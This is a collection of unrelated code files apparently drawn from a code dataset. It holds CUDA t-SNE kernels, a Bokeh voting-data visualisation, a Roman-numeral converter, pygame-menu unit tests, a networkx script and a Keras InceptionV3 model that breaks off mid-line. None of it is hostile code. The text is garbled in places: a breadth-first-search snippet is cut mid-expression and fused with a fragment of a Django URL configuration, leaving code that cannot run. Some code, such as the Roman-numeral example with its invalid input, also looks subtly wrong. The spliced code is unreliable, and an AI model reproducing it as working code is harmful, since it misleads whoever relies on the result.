{"seq_id":"599998046","text":"\n\nimport numpy as np\nimport math\nfrom numba import cuda\nfrom numba import float64\nimport sys\nfrom timeit import default_timer as timer\nimport os\n\n\nthreadsperblock = (32, 32)\n\n@cuda.jit\ndef _compute_sum_of_q_on_gpu(t_sne, partial_sum_q):\n\n i, j = cuda.grid(2)\n\n n = t_sne.shape[0]\n m = t_sne.shape[0]\n\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n\n bx = cuda.blockIdx.x\n by = cuda.blockIdx.y\n\n # create shared memory for this block and fill it with the q values\n block_shared_mem = cuda.shared.array(threadsperblock, dtype=float64)\n\n block_shared_mem[tx, ty] = 0\n if j >= 0 and j <= n - 1 and i >= 0 and i <= m - 1:\n # get the distance between 2 data points\n temp = 0\n for dim in range(t_sne.shape[1]):\n temp += (t_sne[i, dim] - t_sne[j, dim])*(t_sne[i, dim] - t_sne[j, dim])\n #distance = math.sqrt(temp)\n block_shared_mem[tx, ty] = 1 / (1 + temp)\n\n cuda.syncthreads()\n\n # sum up the values of the shared memory array to generate a partial summation matrix (that needs to be 
summed up\n # further on the cpu)\n\n t = threadsperblock[0] // 2\n while t > 0:\n if tx < t:\n block_shared_mem[tx, ty] = block_shared_mem[tx, ty] + block_shared_mem[tx + t, ty]\n t //= 2\n cuda.syncthreads()\n\n t = threadsperblock[0] // 2\n while t > 0:\n if ty < t and tx == 0:\n block_shared_mem[tx, ty] = block_shared_mem[tx, ty] + block_shared_mem[tx, ty + t]\n t //= 2\n cuda.syncthreads()\n\n if tx == 0 and ty == 0:\n partial_sum_q[bx, by] = block_shared_mem[0, 0]\n\n cuda.syncthreads()\n\n\n@cuda.jit(fastmath=True)\ndef _compute_gradient_on_gpu(t_sne, values_p, indices_p, sum_q, delta):\n\n n, m, l = cuda.grid(3)\n\n if n >= 0 and n < t_sne.shape[0] and m >= 0 and m < t_sne.shape[0]:\n\n if l > 0 and l < indices_p.shape[1] + 1 and indices_p[n, l - 1] == m:\n p_value = values_p[n, l - 1]\n\n temp = 0\n for dim in range(t_sne.shape[1]):\n temp += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n #distance = math.sqrt(temp)\n q = 1 / (1 + temp)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for dim in range(t_sne.shape[1]):\n delta[n, dim] += (t_sne[n, dim] - t_sne[m, dim]) * mult\n\n return\n\n if l == 0:\n p_value = 0\n\n temp = 0\n for dim in range(t_sne.shape[1]):\n temp += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n #distance = math.sqrt(temp)\n q = 1 / (1 + temp)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for dim in range(t_sne.shape[1]):\n delta[n, dim] += (t_sne[n, dim] - t_sne[m, dim]) * mult\n\n return\n\n\n@cuda.jit(fastmath=True)\ndef _compute_iteration_on_gpu(t_sne, values_p, indices_p, sum_q, delta, uy, gains, momentum, eta):\n\n n, m, l = cuda.grid(3)\n\n # Make sure we are within range for m and n\n if n >= 0 and n < t_sne.shape[0] and m >= 0 and m < t_sne.shape[0]:\n\n # Calculate the delta. Use l as an index to the 2nd dimension of the p values and indices (3 * perplexity)\n if l > 0 and l < indices_p.shape[1] + 1 and indices_p[n, l - 1] == m:\n p_value = values_p[n, l - 1]\n\n distance = 0\n for dim in range(t_sne.shape[1]):\n distance += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n q = 1 / (1 + distance)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for l in range(t_sne.shape[1]):\n delta[n, l] += (t_sne[n, l] - t_sne[m, l]) * mult\n\n if l == 0:\n p_value = 0\n\n distance = 0\n for dim in range(t_sne.shape[1]):\n distance += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n q = 1 / (1 + distance)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for dim in range(t_sne.shape[1]):\n delta[n, dim] += (t_sne[n, dim] - t_sne[m, dim]) * mult\n\n cuda.syncthreads()\n\n # Calculate the new t-sne. 
Use l as an index to the dimensionality of the t-sne space (2 or 3)\n if m == 0 and l >= 0 and l < t_sne.shape[1]:\n sign_check = delta[n, l] * uy[n, l]\n if sign_check >= 0:\n gains[n, l] *= 0.95\n else:\n gains[n, l] += 0.05\n if gains[n, l] < 0.01:\n gains[n, l] = 0.01\n\n uy[n, l] = momentum[0] * uy[n, l] - eta[0] * gains[n, l] * delta[n, l]\n\n t_sne[n, l] += uy[n, l]\n\n cuda.syncthreads()\n\n'''\ngains[np.argwhere(np.sign(dy) != np.sign(uy))] += 0.05\ngains[np.argwhere(np.sign(dy) == np.sign(uy))] *= 0.95\ngains[np.argwhere(gains < 0.01)] = 0.01\n\n# update gradient\nuy = momentum * uy - eta * gains * dy\ny += uy\n\n# zero mean solution\ny = pylab.demean(y, axis=0)\n'''\ndef _put_array_to_device(array, array_name, dtype=np.float64, verbose=True):\n s = timer()\n temp = np.array(array, dtype=dtype)\n d_array = cuda.to_device(temp)\n e = timer()\n if verbose:\n print(' Load ' + array_name + ' to device time: ' + str(e - s))\n return d_array\n\n\ndef main():\n base_folder = r'D:\\Data\\George\\Projects\\SpikeSorting\\Neuroseeker\\Neuroseeker_2016_12_17_Anesthesia_Auditory_DoubleProbes\\AngledProbe\\KilosortResults'\n\n perplexity = 100\n\n\n indices_p = np.load(os.path.join(base_folder, r'indices_p.npy'))\n values_p = np.load(os.path.join(base_folder, r'values_p.npy'))\n num_dims = 2\n\n extender = 1\n n = indices_p.shape[0] * extender\n print(n)\n tsne = np.array(np.random.random((n, num_dims)), dtype=np.float32)\n\n indices_p = np.tile(indices_p, (extender, 1))\n values_p = np.tile(values_p, (extender, 1))\n\n verbose = True\n threadsperblock = (32, 32)\n blockspergrid_x = math.ceil(tsne.shape[0] / threadsperblock[0])\n blockspergrid_y = math.ceil(tsne.shape[0] / threadsperblock[1])\n blockspergrid = (blockspergrid_x, blockspergrid_y)\n\n num_of_dims = tsne.shape[1]\n partial_sum_q = np.zeros(blockspergrid)\n cuda.profile_start()\n t1s = timer()\n d_tsne = _put_array_to_device(tsne, 't_sne', np.float64, verbose)\n d_partial_sum_q = _put_array_to_device(partial_sum_q, 'partial_sum_q', np.float64, verbose)\n t2s = timer()\n _compute_sum_of_q_on_gpu[blockspergrid, threadsperblock](d_tsne, d_partial_sum_q)\n partial_sum_q = d_partial_sum_q.copy_to_host()\n t2e = timer()\n print('Time to run the sum of q on the gpu = ' + str(t2e - t2s))\n\n t3s = timer()\n sum_q = np.sum(partial_sum_q)\n t3e = timer()\n print('Time to run the sum of q on the cpu = ' + str(t3e - t3s))\n print(sum_q)\n\n d_sum_q = _put_array_to_device(sum_q, 'sum_q', np.float64, verbose)\n\n\n delta = np.zeros((n, num_of_dims))\n uy = np.zeros((n, num_dims))\n gains = np.ones((n, num_dims))\n momentum = [0.5]\n eta = [200]\n d_indices_p = _put_array_to_device(indices_p, 'indices_p', dtype=np.float64, verbose=verbose)\n d_values_p = _put_array_to_device(values_p, 'values_p', dtype=np.float64, verbose=verbose)\n d_delta = _put_array_to_device(delta, 'delta', dtype=np.float64, verbose=verbose)\n d_uy = _put_array_to_device(uy, 'uy', dtype=np.float64, verbose=verbose)\n d_gains = _put_array_to_device(gains, 'gains', dtype=np.float64, verbose=verbose)\n d_momentum = _put_array_to_device(momentum, 'momentum', dtype=np.float64, verbose=False)\n d_eta = _put_array_to_device(eta, 'eta', dtype=np.float64, verbose=False)\n\n threadsperblock = (8, 8, 8)\n blockspergrid_x = math.ceil(tsne.shape[0] / threadsperblock[0])\n blockspergrid_y = math.ceil(tsne.shape[0] / threadsperblock[1])\n blockspergrid_z = math.ceil((indices_p.shape[1] + 1) / threadsperblock[2])\n blockspergrid = (blockspergrid_x, blockspergrid_y, blockspergrid_z)\n\n\n 
t4s = timer()\n _compute_iteration_on_gpu[blockspergrid, threadsperblock](d_tsne, d_values_p, d_indices_p, d_sum_q, d_delta, d_uy,\n d_gains, d_momentum, d_eta)\n #_compute_gradient_on_gpu[blockspergrid, threadsperblock](d_tsne, d_values_p, d_indices_p, d_sum_q, d_delta)\n t4e = timer()\n print('Time to run one iteration on gpu = ' + str(t4e - t4s))\n t_sne = d_tsne.copy_to_host()\n t1e = timer()\n cuda.profile_stop()\n print('Time to copy t_sne to host = ' + str(t1e-t4e))\n print('Total time = ' + str(t1e - t1s))\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"spikesort_tsne/python/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":8796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586124840","text":"import pandas as pd\nfrom bokeh.plotting import figure, output_notebook, show, output_file\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.tools import HoverTool, BoxSelectTool, LassoSelectTool, PointDrawTool\nfrom random import random\n\nfrom bokeh.layouts import row, column\nfrom bokeh.models import CustomJS, ColumnDataSource\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.models.widgets import DataTable, DateFormatter, TableColumn, NumberFormatter, HTMLTemplateFormatter, Panel, Tabs\nfrom bokeh.io import output_file, show\nfrom bokeh.layouts import widgetbox,layout\nfrom bokeh.models.widgets import Slider, Div, Button, Toggle\nfrom bokeh.models.glyphs import Text\nfrom os.path import dirname,join\nfrom bokeh.io import curdoc\n\nbase=[\"Institutions\"]\nlong=['Démocratie, Institutions']\n\nfor ix in range(0, len(base)):\n b=base[ix]\n ti=long[ix]\n i=b+\".csv\"\n o=b+\".html\"\n df = pd.read_csv(i)\n df['lcol']=\"#00000000\"\n df.ptcex=df.ptcex*10\n df['id']=list(df.index)\n df['txt_alpha']=0\n df2=df.copy(deep=True)\n source=ColumnDataSource(df)\n s2 = ColumnDataSource(data=dict(id=[], n_vote=[], vote=[], title=[], body=[]))\n filsource=ColumnDataSource(df2)\n output_file(o)\n #wi=900\n div = Div(text=\"\"\"Sélectionner des points pour afficher les satistiques.\"\"\")\n# div = Div(text=\"\"\"Sélectionner des points pour afficher les satistiques.\"\"\", width=wi, height=50)\n\n p1 = figure(plot_height=600, title=ti, tools='box_select,lasso_select,box_zoom,wheel_zoom,reset', plot_width=900)\n# p1 = figure(plot_height=600, plot_width=wi, title=ti, tools='box_select,lasso_select,box_zoom,wheel_zoom')\n\n r1=p1.circle('tsneX', 'tsneY', source=filsource, alpha=0.6, size='ptcex', color='ptcol', line_color=\"lcol\", line_width=3)\n txt=Text(x='tsneX', y='tsneY', text='title', text_alpha='txt_alpha', text_align='center')\n p1.add_glyph(filsource, txt)\n \n hover = HoverTool()\n hover.tooltips=[\n ('Votes', '@n_vote'),\n ('Adoption', '@vote'),\n ('Titre', '@title')]\n hover.renderers=[r1]\n\n p1.add_tools(hover)\n tool = PointDrawTool(renderers=[r1], num_objects=2000)\n p1.add_tools(tool)\n\n filsource.selected.js_on_change('indices', CustomJS(args=dict(source=filsource, s2=s2, div=div), code=\"\"\"\n var inds = cb_obj.indices;\n var d1 = source.data;\n var d2 = s2.data;\n d2['vote'] = []\n d2['n_vote'] = []\n d2['title'] = []\n d2['body'] = []\n d2['id'] = []\n var totvot=0;\n var tota=0\n for (var i = 0; i < inds.length; i++) {\n d2['vote'].push(d1['vote'][inds[i]])\n d2['n_vote'].push(d1['n_vote'][inds[i]])\n d2['title'].push(d1['title'][inds[i]])\n d2['body'].push(d1['body'][inds[i]])\n d2['id'].push(d1['id'][inds[i]])\n totvot=totvot+d1['n_vote'][inds[i]]\n 
tota=tota+d1['n_vote'][inds[i]]*d1['vote'][inds[i]]\n }\n tota=tota/totvot;\n s2.change.emit();\n div.text=\"Total votes: \"+totvot;\n div.text=div.text+\"
Approbation: \";\n div.text=div.text+tota;\n \"\"\")\n )\n\n s2.selected.js_on_change('indices', CustomJS(args=dict(source=filsource, s2=s2, div=div), code=\"\"\"\n var inds = cb_obj.indices;\n var d1 = source.data;\n var d2 = s2.data;\n toselect = []\n var totvot=0\n var tota=0\n for (var i = 0; i < inds.length; i++) {\n toselect.push(d2['id'][inds[i]])\n totvot=totvot+d2['n_vote'][inds[i]]\n tota=tota+d2['n_vote'][inds[i]]*d2['vote'][inds[i]]\n }\n\n //alert(toselect)\n for (var i = 0; i < d1['id'].length; i++) {\n for(var j = 0; j < toselect.length; j++){\n if(d1['id'][i]==toselect[j])\n {\n d1['lcol'][i]=\"#b22222ff\"\n break;\n }else{\n d1['lcol'][i]=\"#00000000\"\n }\n\n }\n }\n source.change.emit();\n tota=tota/totvot;\n div.text=\"Total votes: \"+totvot;\n div.text=div.text+\"
Approbation: \";\n div.text=div.text+tota;\n div.text=div.text+\"
Sélection:\";\n div.text=div.text+toselect\n \"\"\")\n )\n\n filtervote=CustomJS(args=dict(source=source, filsource=filsource, s2=s2, div=div), code=\"\"\"\n var cutoff_n = nvote.value;\n var cutoff = vote.value;\n var showtxt = txt.active;\n cutoff=cutoff/100;\n var mastersrc= source.data;\n var plotsrc = filsource.data;\n //var tablesrc = s2.data;\n plotsrc['vote'] = []\n plotsrc['n_vote'] = []\n plotsrc['title'] = []\n plotsrc['body'] = []\n plotsrc['id'] = []\n plotsrc['tsneX'] = []\n plotsrc['tsneY'] = []\n plotsrc['ptcol'] = []\n plotsrc['ptcex'] = []\n plotsrc['txt_alpha'] = []\n //alert(!ci.active)\n thr=0.05/(mastersrc['p_prop'].length)\n for (var i = 0; i < mastersrc['vote'].length; i++) {\n if(((mastersrc['n_vote'][i])>cutoff_n) && ( ((mastersrc['vote'][i])>cutoff) || ((mastersrc['vote'][i])<(1-cutoff)) )){\n if((!ci.active) || (mastersrc['p_prop'][i]<%= title %>')),\n TableColumn(field=\"body\", title=\"Corps\", formatter=HTMLTemplateFormatter(template='
<%= body %>
')),\n ]\n\n p2= DataTable(source=s2, columns=columns, width=1200)\n# p2= DataTable(source=s2, columns=columns, width=wi, height=400)\n\n\n end_slider=max(df.n_vote)\n nvote_slider = Slider(start=0, end=end_slider, value=0,step=10, title=\"Nombre de votes minimum\", callback=filtervote)\n filtervote.args[\"nvote\"] = nvote_slider\n vote_slider = Slider(start=50, end=100, value=50, title=\"Approbation/rejet(%)\", callback=filtervote)\n filtervote.args[\"vote\"] = vote_slider\n \n toggle = Toggle(label=\"Cacher points non significatifs\", callback=filtervote, width=50)\n toggle_expl=Div(text=\"\"\"Ce bouton masque les propositions dont l'approbation ne peut pas être distinguée statistiquement de 50%. Par exemple, une approbation de 60% ne veut presque rien dire si on la calcule sur 10 votes, par contre sur 5000 on est sûr qu'une majorité des votants est d'accord avec la proposition.Formellement, ce filtrage est obtenu par un test binomial exact bi-directionnel avec correction de Bonferroni.\"\"\")\n toggletxt = Toggle(label=\"Afficher le titre des revendications\", callback=filtervote, width=50)\n toggletxt_exp = Div(text=\"\"\"Attention: Filtrer les points et/ou zoomer avant d'afficher le texte pour que le graphique reste lisible.\"\"\")\n filtervote.args[\"ci\"]=toggle\n filtervote.args[\"txt\"]=toggletxt\n\n dl = Button(label=\"Télécharger données filtrées\", button_type=\"success\")\n dl.callback = CustomJS(args=dict(source=filsource),\n code=open(join(dirname(__file__), \"download.js\")).read())\n\n \n bbox=column([nvote_slider, vote_slider, toggle, toggle_expl, toggletxt, toggletxt_exp, dl])\n \n# l=layout([[p1, bbox]], sizing_mode='stretch_both') # sizing mode is completely broken, fixed widths it is :(\n l=layout([[p1, bbox], [div], [p2]])\n #layout = column(sli1,p1)\n l.sizing_mode = 'scale_width'\n \n #show(l)\n curdoc().add_root(l)\n","sub_path":"apps/Institutions.py","file_name":"Institutions.py","file_ext":"py","file_size_in_byte":8840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233795400","text":"\n\nclass Solution:\n\n def romanToInt(self, inputStr):\n # def convert(inputStr):\n global valueDict\n\n valueDict = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n retArr = [valueDict[chr] for chr in\n inputStr] # String is also a char array. replace all characters with correponding decimal numbers\n for index, j in enumerate(retArr): # use enumerate to access the index while iterating\n try:\n if retArr[index] < retArr[index + 1]: retArr[index] = retArr[index] * -1\n except IndexError:\n continue # ignore the IndexError exception if array index is overflows while comparing the last character\n print(sum(retArr))\n return sum(retArr) # use sum to sum all values in a list\n\n\n\n#print(RomanToDecimal(\"XXXXXX\"))\nSolution().romanToInt(\"MCMXXIIX\")\n","sub_path":"guruRoman.py","file_name":"guruRoman.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350592946","text":"\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nTEST WIDGET - BUTTON\nTest Button widget.\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2021 Pablo Pizarro R. 
@ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\n__all__ = ['ButtonWidgetTest']\n\nfrom test._utils import MenuUtils, surface, PygameEventUtils, BaseTest, PYGAME_V2\n\nimport pygame\nimport pygame_menu\n\nfrom pygame_menu.widgets import Button\n\n\nclass ButtonWidgetTest(BaseTest):\n\n def test_button(self) -> None:\n \"\"\"\n Test button widget.\n \"\"\"\n menu = MenuUtils.generic_menu()\n menu2 = MenuUtils.generic_menu()\n\n # Valid\n def test() -> bool:\n \"\"\"\n Callback.\n \"\"\"\n return True\n\n # Invalid ones\n invalid = [\n bool, # type\n object, # object\n 1, # int\n 'a', # str\n True, # bool\n pygame, # module\n surface, # pygame\n 1.1, # float\n menu.add.button('eee'), # widget\n [1, 2, 3], # list\n (1, 2, 3), # tuple\n pygame_menu.BaseImage(pygame_menu.baseimage.IMAGE_EXAMPLE_GRAY_LINES) # baseimage\n ]\n for i in invalid:\n self.assertRaises(ValueError, lambda: menu.add.button('b1', i))\n\n # Valid\n valid = [\n menu2,\n test,\n pygame_menu.events.NONE,\n pygame_menu.events.PYGAME_QUIT,\n pygame_menu.events.PYGAME_WINDOWCLOSE,\n None,\n lambda: test(),\n None\n ]\n for v in valid:\n self.assertTrue(menu.add.button('b1', v) is not None)\n\n btn = menu.add.button('b1', menu2)\n for v in [menu, 1, bool, object, [1, 2, 3], (1, 2, 3)]:\n self.assertRaises(AssertionError, lambda: btn.update_callback(v))\n btn.update_callback(test)\n\n # Invalid recursive menu\n self.assertRaises(ValueError, lambda: menu.add.button('bt', menu))\n\n # Test callback\n test = [False]\n\n def callback(t=False) -> None:\n \"\"\"\n Callback.\n \"\"\"\n test[0] = t\n\n btn = Button('epic', t=True, onreturn=callback)\n btn.apply()\n self.assertTrue(test[0])\n test[0] = False\n\n def callback() -> None:\n \"\"\"\n Callback.\n \"\"\"\n test[0] = False\n\n btn = Button('epic', onreturn=callback)\n btn.apply()\n self.assertFalse(test[0])\n\n # Test with no kwargs\n def callback(**kwargs) -> None:\n \"\"\"\n Callback.\n \"\"\"\n self.assertEqual(len(kwargs.keys()), 0)\n\n btn = menu.add.button('epic', callback, accept_kwargs=False)\n btn.apply()\n\n # Test with kwargs\n def callback(**kwargs) -> None:\n \"\"\"\n Callback.\n \"\"\"\n self.assertEqual(len(kwargs.keys()), 1)\n self.assertTrue(kwargs.get('key', False))\n\n btn = Button('epic', onreturn=callback, key=True)\n self.assertTrue(btn._ignores_keyboard_nonphysical())\n btn.apply()\n btn = menu.add.button('epic', callback, accept_kwargs=True, key=True)\n btn.apply()\n\n # Test 
pygame events\n btn = menu.add.button('epic', pygame_menu.events.PYGAME_QUIT)\n self.assertEqual(btn._onreturn, menu._exit)\n btn = menu.add.button('epic', pygame_menu.events.PYGAME_WINDOWCLOSE)\n self.assertEqual(btn._onreturn, menu._exit)\n\n # Test None\n btn = menu.add.button('epic', pygame_menu.events.NONE)\n self.assertIsNone(btn._onreturn)\n btn = menu.add.button('epic')\n self.assertIsNone(btn._onreturn)\n\n # Test invalid kwarg\n self.assertRaises(ValueError, lambda: menu.add.button('epic', callback, key=True))\n\n # Remove button\n menu.remove_widget(btn)\n self.assertRaises(ValueError, lambda: menu.remove_widget(btn))\n\n # Test underline\n # Add underline\n btn = menu.add.button('epic', pygame_menu.events.NONE)\n self.assertEqual(btn._decorator._total_decor(), 0)\n btn.add_underline((0, 0, 0), 1, 1, force_render=True)\n self.assertNotEqual(btn._last_underline[0], '')\n self.assertEqual(btn._decorator._total_decor(), 1)\n btn.remove_underline()\n self.assertEqual(btn._last_underline[0], '')\n\n # Test return fun\n def fun() -> str:\n \"\"\"\n This should return \"nice\".\n \"\"\"\n return 'nice'\n\n btn = menu.add.button('', fun)\n self.assertEqual(btn.apply(), 'nice')\n btn.readonly = True\n self.assertIsNone(btn.apply())\n self.assertFalse(btn.update(PygameEventUtils.keydown(pygame_menu.controls.KEY_APPLY)))\n\n # Test button to menu\n btn_menu = menu.add.button('to2', menu2)\n self.assertTrue(btn_menu.to_menu)\n menu.full_reset()\n self.assertTrue(btn_menu.update(PygameEventUtils.keydown(pygame_menu.controls.KEY_APPLY)))\n self.assertEqual(menu.get_current(), menu2)\n menu.full_reset()\n self.assertEqual(menu.get_current(), menu)\n\n # Warns if adding button to menu\n btn.set_menu(None)\n btn.to_menu = True\n menu2.add.generic_widget(btn)\n\n # Test extreme resize\n btn.resize(1, 1)\n btn.set_max_height(None)\n btn.set_max_width(None)\n btn.flip(True, True)\n self.assertEqual(btn._flip, (True, True))\n\n # Test consistency if active\n btn.active = True\n btn._selected = False\n btn.draw(surface)\n self.assertFalse(btn.active)\n\n # Try onchange\n btn._onchange = lambda: None\n self.assertIsNone(btn.change())\n\n def test_empty_title(self) -> None:\n \"\"\"\n Test empty title.\n \"\"\"\n menu = MenuUtils.generic_menu()\n btn = menu.add.button('')\n p = btn._padding\n self.assertEqual(btn.get_width(), p[1] + p[3])\n self.assertEqual(btn.get_height(), p[0] + p[2] + (41 if PYGAME_V2 else 42))\n\n def test_value(self) -> None:\n \"\"\"\n Test button value.\n \"\"\"\n menu = MenuUtils.generic_menu()\n btn = menu.add.button('button')\n self.assertRaises(ValueError, lambda: btn.get_value())\n self.assertRaises(ValueError, lambda: btn.set_value('value'))\n self.assertFalse(btn.value_changed())\n btn.reset_value()\n","sub_path":"test/test_widget_button.py","file_name":"test_widget_button.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"644210854","text":"import networkx as nx\n\n# brain = nx.DiGraph() #for the first time\nbrain = nx.read_edgelist('db.edgelist', create_using=nx.DiGraph(), nodetype=str, data=(('weight', int),)) \n\n\ndef simple_learn(brain):\n while True:\n s = input()\n if s == 'quit':\n return\n else:\n ind = s.find(' ')\n inp_edge = (s[:ind], s[ind + 1:])\n if inp_edge in brain.edges():\n \tbrain[s[:ind]][s[ind + 1:]]['weight'] += 1\n else:\n \tbrain.add_edges_from([inp_edge], weight = 1)\n 
nx.write_edgelist(brain,'db.edgelist',data=['weight'])\n\nsimple_learn(brain)\n\n","sub_path":"veera/consolelearning.py","file_name":"consolelearning.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269983633","text":"import sys\nfrom collections import deque\n\nsys.stdin = open('input.txt','r')\n\nN,M = map(int,sys.stdin.readline().rstrip().split())\n\nmap = [[i for i in sys.stdin.readline().rstrip()] for j in range(N)]\nvisit = [[[[[0 for i in range(M)] for j in range(N)] for k in range(4)] for q in range(2)] for p in range(2)]\n\ndef inRange(a,b):\n if (0<=a/',views.productDetailPage,name='product_detail'),\r\n path('product/',views.productPage,name='product'),\r\n path('quickView/',views.quickView,name='quickView'),\r\n path('product/sortBy//',views.productSortBy,name='productSortBy'),\r\n \r\n]","sub_path":"Product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38745265","text":"import tensorflow as tf\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\ntf.get_logger().setLevel('ERROR')\nimport tensorflow.keras.layers as layers\nimport tensorflow.keras.models as models\n\n\ndef conv2d_bn(x,\n filters,\n num_row,\n num_col,\n padding='same',\n strides=(1, 1),\n name=None):\n \"\"\"Utility function to apply conv + BN.\n # Arguments\n x: input tensor.\n filters: filters in `Conv2D`.\n num_row: height of the convolution kernel.\n num_col: width of the convolution kernel.\n padding: padding mode in `Conv2D`.\n strides: strides in `Conv2D`.\n name: name of the ops; will become `name + '_conv'`\n for the convolution and `name + '_bn'` for the\n batch norm layer.\n # Returns\n Output tensor after applying `Conv2D` and `BatchNormalization`.\n \"\"\"\n if name is not None:\n bn_name = name + '_bn'\n conv_name = name + '_conv'\n else:\n bn_name = None\n conv_name = None\n \n bn_axis = 3\n x = layers.Conv2D(\n filters, (num_row, num_col),\n strides=strides,\n padding=padding,\n use_bias=False,\n name=conv_name)(x)\n x = layers.BatchNormalization(axis=bn_axis, scale=False, name=bn_name)(x)\n x = layers.Activation('relu', name=name)(x)\n return x\n\ndef InceptionV3():\n img_input = layers.Input(shape=(256,256,3))\n \n channel_axis = 3\n \n x = conv2d_bn(img_input, 32, 3, 3, strides=(2, 2), padding='valid')\n x = conv2d_bn(x, 32, 3, 3, padding='valid')\n x = conv2d_bn(x, 64, 3, 3)\n x = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n \n x = conv2d_bn(x, 80, 1, 1, padding='valid')\n x = conv2d_bn(x, 192, 3, 3, padding='valid')\n x = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n \n # mixed 0: 35 x 35 x 256\n branch1x1 = conv2d_bn(x, 64, 1, 1)\n \n branch5x5 = conv2d_bn(x, 48, 1, 1)\n branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 32, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch5x5, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed0')\n \n # mixed 1: 35 x 35 x 288\n branch1x1 = conv2d_bn(x, 64, 1, 1)\n \n branch5x5 = conv2d_bn(x, 48, 1, 1)\n branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n 
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 64, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch5x5, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed1')\n \n # mixed 2: 35 x 35 x 288\n branch1x1 = conv2d_bn(x, 64, 1, 1)\n \n branch5x5 = conv2d_bn(x, 48, 1, 1)\n branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 64, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch5x5, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed2')\n \n # mixed 3: 17 x 17 x 768\n branch3x3 = conv2d_bn(x, 384, 3, 3, strides=(2, 2), padding='valid')\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(\n branch3x3dbl, 96, 3, 3, strides=(2, 2), padding='valid')\n \n branch_pool = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n x = layers.concatenate(\n [branch3x3, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed3')\n \n # mixed 4: 17 x 17 x 768\n branch1x1 = conv2d_bn(x, 192, 1, 1)\n \n branch7x7 = conv2d_bn(x, 128, 1, 1)\n branch7x7 = 